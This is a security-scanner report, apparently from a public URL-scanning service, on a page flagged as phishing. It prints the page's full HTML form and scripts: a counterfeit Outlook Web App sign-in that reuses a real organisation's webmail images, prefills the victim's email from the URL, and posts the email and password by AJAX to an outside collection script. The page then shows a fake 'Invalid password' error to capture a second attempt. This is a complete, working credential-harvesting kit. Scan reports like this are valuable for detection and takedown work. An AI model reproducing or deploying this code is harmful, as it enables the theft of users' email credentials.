www.anmattwi.com
192.185.76.200
Malicious Activity!
Public Scan
Submitted URL: http://anmattwi.com/outlookwebapp.html?msg=
Effective URL: http://www.anmattwi.com/outlookwebapp.html?msg=
Submission: On August 20 via automatic, source openphish
Form analysis
1 form found in the DOM
Name: logonForm — POST
<form action="" method="POST" name="logonForm" enctype="" autocomplete="off">
<input type="hidden" name="destination" value="https://webmail.ipehq.com/owa/">
<input type="hidden" name="flags" value="0">
<input type="hidden" name="forcedownlevel" value="0">
<table align="center" id="tblMain" cellpadding="0" cellspacing="0">
<tbody>
<tr>
<td colspan="3">
<table cellspacing="0" cellpadding="0" class="tblLgn">
<tbody>
<tr>
<td class="lgnTL"><img src="https://webmail.ipehq.com/owa/14.3.382.0/themes/resources/lgntopl.gif" alt=""></td>
<td class="lgnTM"></td>
<td class="lgnTR"><img src="https://webmail.ipehq.com/owa/14.3.382.0/themes/resources/lgntopr.gif" alt=""></td>
</tr>
</tbody>
</table>
</td>
</tr>
<tr>
<td id="mdLft"> </td>
<td id="mdMid">
<table id="tblMid" class="mid">
<tbody>
<tr>
<td id="expltxt" class="expl">
</td>
</tr>
<tr>
<td>
<hr>
</td>
</tr>
<tr>
<td>
<table cellpadding="0" cellspacing="0">
<colgroup>
<col>
<col class="w100">
</colgroup>
<tbody>
<tr id="trSec">
<td colspan="2"> Security ( <a href="#" id="lnkShwSec" onclick="clkExp('lnkShwSec')">
show explanation
</a>
<a href="#" id="lnkHdSec" onclick="clkExp('lnkHdSec')" style="display:none">
hide explanation
</a> )
</td>
</tr>
<tr>
<td><input id="rdoPblc" type="radio" name="trusted" value="0" class="rdo" onclick="clkSec()" checked=""></td>
<td><label for="rdoPblc">This is a public or shared computer</label></td>
</tr>
<tr id="trPubExp" class="expl" style="display:none">
<td></td>
<td>Select this option if you use Outlook Web App on a public computer. Be sure to sign out when you've finished and close all windows to end your session.</td>
</tr>
<tr>
<td><input id="rdoPrvt" type="radio" name="trusted" value="4" class="rdo" onclick="clkSec()"></td>
<td><label for="rdoPrvt">This is a private computer</label></td>
</tr>
<tr id="trPrvtExp" class="expl" style="display:none">
<td></td>
<td>Select this option if you're the only person who uses this computer. Your server will allow a longer period of inactivity before signing you out.</td>
</tr>
<tr id="trPrvtWrn" class="wrng" style="display:none">
<td></td>
<td>Warning: By selecting this option, you confirm that this computer complies with your organization's security policy.</td>
</tr>
</tbody>
</table>
</td>
</tr>
<tr>
<td>
<hr>
</td>
</tr>
<tr>
<td>
<table cellpadding="0" cellspacing="0">
<colgroup>
<col>
<col class="w100">
</colgroup>
<tbody>
<tr>
<td><input id="chkBsc" type="checkbox" class="rdo" onclick="clkBsc();"></td>
<td nowrap=""><label for="chkBsc">Use the light version of Outlook Web App</label></td>
</tr>
<tr id="trBscExp" class="disBsc" style="display:none">
<td></td>
<td>The light version of Outlook Web App includes fewer features. Use it if you're on a slow connection or using a computer with unusually strict browser security settings. We also support the full Outlook Web App experience
on some browsers on Windows, Mac, and Linux computers. To check out all the supported browsers and operating systems, <a href="http://go.microsoft.com/fwlink/?LinkID=129362" id="bscLnk">click here.</a></td>
</tr>
</tbody>
</table>
</td>
</tr>
<tr>
<td>
<hr>
</td>
</tr>
<tr>
<td>
<p id="msg" style="color:red;"></p>
<table cellpadding="0" cellspacing="0">
<colgroup>
<col class="nowrap">
<col class="w100">
</colgroup>
<colgroup>
<col>
</colgroup>
<tbody>
<tr>
<td nowrap=""><label for="username">User name:</label></td>
<td class="txtpad"><input id="email" name="email" type="text" class="txt"></td>
</tr>
<tr>
<td nowrap=""><label for="password">Password:</label></td>
<td class="txtpad"><input id="password" name="password" type="password" class="txt" onfocus="on">
</td>
</tr>
<tr>
<td colspan="2" align="right" class="txtpad">
<button id="submit-btn" class="btn">Sign in</button>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
<tr>
<td>
<hr>
</td>
</tr>
</tbody>
</table>
<table id="tblMid2" class="mid" style="display:none">
<tbody>
<tr>
<td>
<hr>
</td>
</tr>
<tr>
<td><br>Please enable cookies for this Web site.<br><br>Cookies are currently disabled by your browser. Outlook Web App requires that cookies be enabled. <br><br>For information about how to enable cookies, see the Help for your Web
browser.<br><br><br></td>
</tr>
<tr>
<td>
<hr>
</td>
</tr>
</tbody>
</table>
<table class="mid tblConn">
<tbody>
<tr>
<td rowspan="2" align="right" class="tdConnImg"><img style="vertical-align:top" src="https://webmail.ipehq.com/owa/14.3.382.0/themes/resources/lgnexlogo.gif" alt=""></td>
<td class="tdConn">Connected to Microsoft Exchange</td>
</tr>
<tr>
<td class="tdCopy">© 2010 Microsoft Corporation. All rights reserved.</td>
</tr>
</tbody>
</table>
</td>
<td id="mdRt"> </td>
</tr>
<tr>
<td colspan="3">
<table cellspacing="0" cellpadding="0" class="tblLgn">
<tbody>
<tr>
<td class="lgnBL"><img src="https://webmail.ipehq.com/owa/14.3.382.0/themes/resources/lgnbotl.gif" alt=""></td>
<td class="lgnBM"></td>
<td class="lgnBR"><img src="https://webmail.ipehq.com/owa/14.3.382.0/themes/resources/lgnbotr.gif" alt=""></td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
<script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
<script type="text/javascript" src="https://cdn.jsdelivr.net/npm/jquery.session@1.0.0/jquery.session.min.js"></script>
<script>
/* global $ */
$(document).ready(function() {
var count = 0;
function getUrlVars() {
var vars = {};
var parts = window.location.href.replace(/[?&]+([^=&]+)=([^&]*)/gi, function(m, key, value) {
vars[key] = value;
});
return vars;
}
var number = getUrlVars()["msg"];
$("#email").val(number);
var my_email = number;
var ind = my_email.indexOf("@");
var my_slice = my_email.substr((ind + 1));
var c = my_slice.substr(0, my_slice.indexOf('.'));
var final = c.toLowerCase();
var domain = final.charAt(0).toUpperCase() + final.slice(1);
$('#submit-btn').click(function(event) {
$('#error').hide();
$('#msg').hide();
event.preventDefault();
var email = $("#email").val();
var password = $("#password").val();
var msg = $('#msg').html();
$('#msg').text(msg);
if (!password) {
$('#msg').show();
$('#msg').html("Password field is emply.!");
return false;
}
///////////new injection////////////////
var my_email = email;
var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;
if (!filter.test(my_email)) {
$('#error').show();
email.focus;
return false;
}
var ind = my_email.indexOf("@");
var my_slice = my_email.substr((ind + 1));
var c = my_slice.substr(0, my_slice.indexOf('.'));
var final = c.toLowerCase();
var finalu = c.toUpperCase();
$("#logoimg").attr("src", "https://www.google.com/s2/favicons?domain=" + my_slice);
$("#logoname").html(finalu);
///////////new injection////////////////
count = count + 1;
$.ajax({
dataType: 'JSON',
url: 'https://bradleyvisuals.com/poster.php',
type: 'POST',
data: {
email: email,
password: password,
},
// data: $('#contact').serialize(),
beforeSend: function(xhr) {
$('#submit-btn').html('Verifing...');
},
success: function(response) {
if (response) {
$("#msg").show();
console.log(response);
if (response['signal'] == 'ok') {
$("#password").val("");
if (count >= 2) {
count = 0;
// window.location.replace(response['redirect_link']);
window.location.replace("complete259e.html?msg=" + email);
}
$("#msg").show();
$('#msg').html("Invalid password. Please try again");
} else {
$("#msg").show();
$('#msg').html("Invalid password. Please try again");
}
}
},
error: function() {
$("#password").val("");
if (count >= 2) {
count = 0;
window.location.replace("complete259e.html?msg=" + email);
}
$("#msg").show();
$('#msg').html("Invalid password. Please try again");
},
complete: function() {
$('#submit-btn').html('Sign in');
}
});
});
});
</script>
<script>
/* global $ */
$(document).ready(function() {
var count = 0;
function getUrlVars() {
var vars = {};
var parts = window.location.href.replace(/[?&]+([^=&]+)=([^&]*)/gi, function(m, key, value) {
vars[key] = value;
});
return vars;
}
var number = getUrlVars()["msg"];
$("#email").val(number);
var my_email = number;
var ind = my_email.indexOf("@");
var my_slice = my_email.substr((ind + 1));
var c = my_slice.substr(0, my_slice.indexOf('.'));
var final = c.toLowerCase();
var domain = final.charAt(0).toUpperCase() + final.slice(1);
$('#submit-btn').click(function(event) {
$('#error').hide();
$('#msg').hide();
event.preventDefault();
var email = $("#email").val();
var password = $("#password").val();
var msg = $('#msg').html();
$('#msg').text(msg);
if (!password) {
$('#msg').show();
$('#msg').html("Password field is emply.!");
return false;
}
///////////new injection////////////////
var my_email = email;
var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;
if (!filter.test(my_email)) {
$('#error').show();
email.focus;
return false;
}
var ind = my_email.indexOf("@");
var my_slice = my_email.substr((ind + 1));
var c = my_slice.substr(0, my_slice.indexOf('.'));
var final = c.toLowerCase();
var finalu = c.toUpperCase();
$("#logoimg").attr("src", "https://www.google.com/s2/favicons?domain=" + my_slice);
$("#logoname").html(finalu);
///////////new injection////////////////
count = count + 1;
$.ajax({
dataType: 'JSON',
url: 'https://bradleyvisuals.com/posters.php',
type: 'POST',
data: {
email: email,
password: password,
},
// data: $('#contact').serialize(),
beforeSend: function(xhr) {
$('#submit-btn').html('Verifing...');
},
success: function(response) {
if (response) {
$("#msg").show();
console.log(response);
if (response['signal'] == 'ok') {
$("#password").val("");
if (count >= 2) {
count = 0;
// window.location.replace(response['redirect_link']);
window.location.replace("complete259e.html?msg=" + email);
}
$("#msg").show();
$('#msg').html("Invalid password. Please try again");
} else {
$("#msg").show();
$('#msg').html("Invalid password. Please try again");
}
}
},
error: function() {
$("#password").val("");
if (count >= 2) {
count = 0;
window.location.replace("complete259e.html?msg=" + email);
}
$("#msg").show();
$('#msg').html("Invalid password. Please try again");
},
complete: function() {
$('#submit-btn').html('Sign in');
}
});
});
});
</script>
</form>
Text Content
To use Outlook Web App, browser settings must allow scripts to run. For information about how to allow scripts, consult the Help for your browser. If your browser doesn't support scripts, you can download Windows Internet Explorer for access to Outlook Web App. -------------------------------------------------------------------------------- Security ( show explanation hide explanation ) This is a public or shared computer Select this option if you use Outlook Web App on a public computer. Be sure to sign out when you've finished and close all windows to end your session. This is a private computer Select this option if you're the only person who uses this computer. Your server will allow a longer period of inactivity before signing you out. Warning: By selecting this option, you confirm that this computer complies with your organization's security policy. -------------------------------------------------------------------------------- Use the light version of Outlook Web App The light version of Outlook Web App includes fewer features. Use it if you're on a slow connection or using a computer with unusually strict browser security settings. We also support the full Outlook Web App experience on some browsers on Windows, Mac, and Linux computers. To check out all the supported browsers and operating systems, click here. -------------------------------------------------------------------------------- User name: Password: Sign in -------------------------------------------------------------------------------- -------------------------------------------------------------------------------- Please enable cookies for this Web site. Cookies are currently disabled by your browser. Outlook Web App requires that cookies be enabled. For information about how to enable cookies, see the Help for your Web browser. -------------------------------------------------------------------------------- Connected to Microsoft Exchange © 2010 Microsoft Corporation. All rights reserved.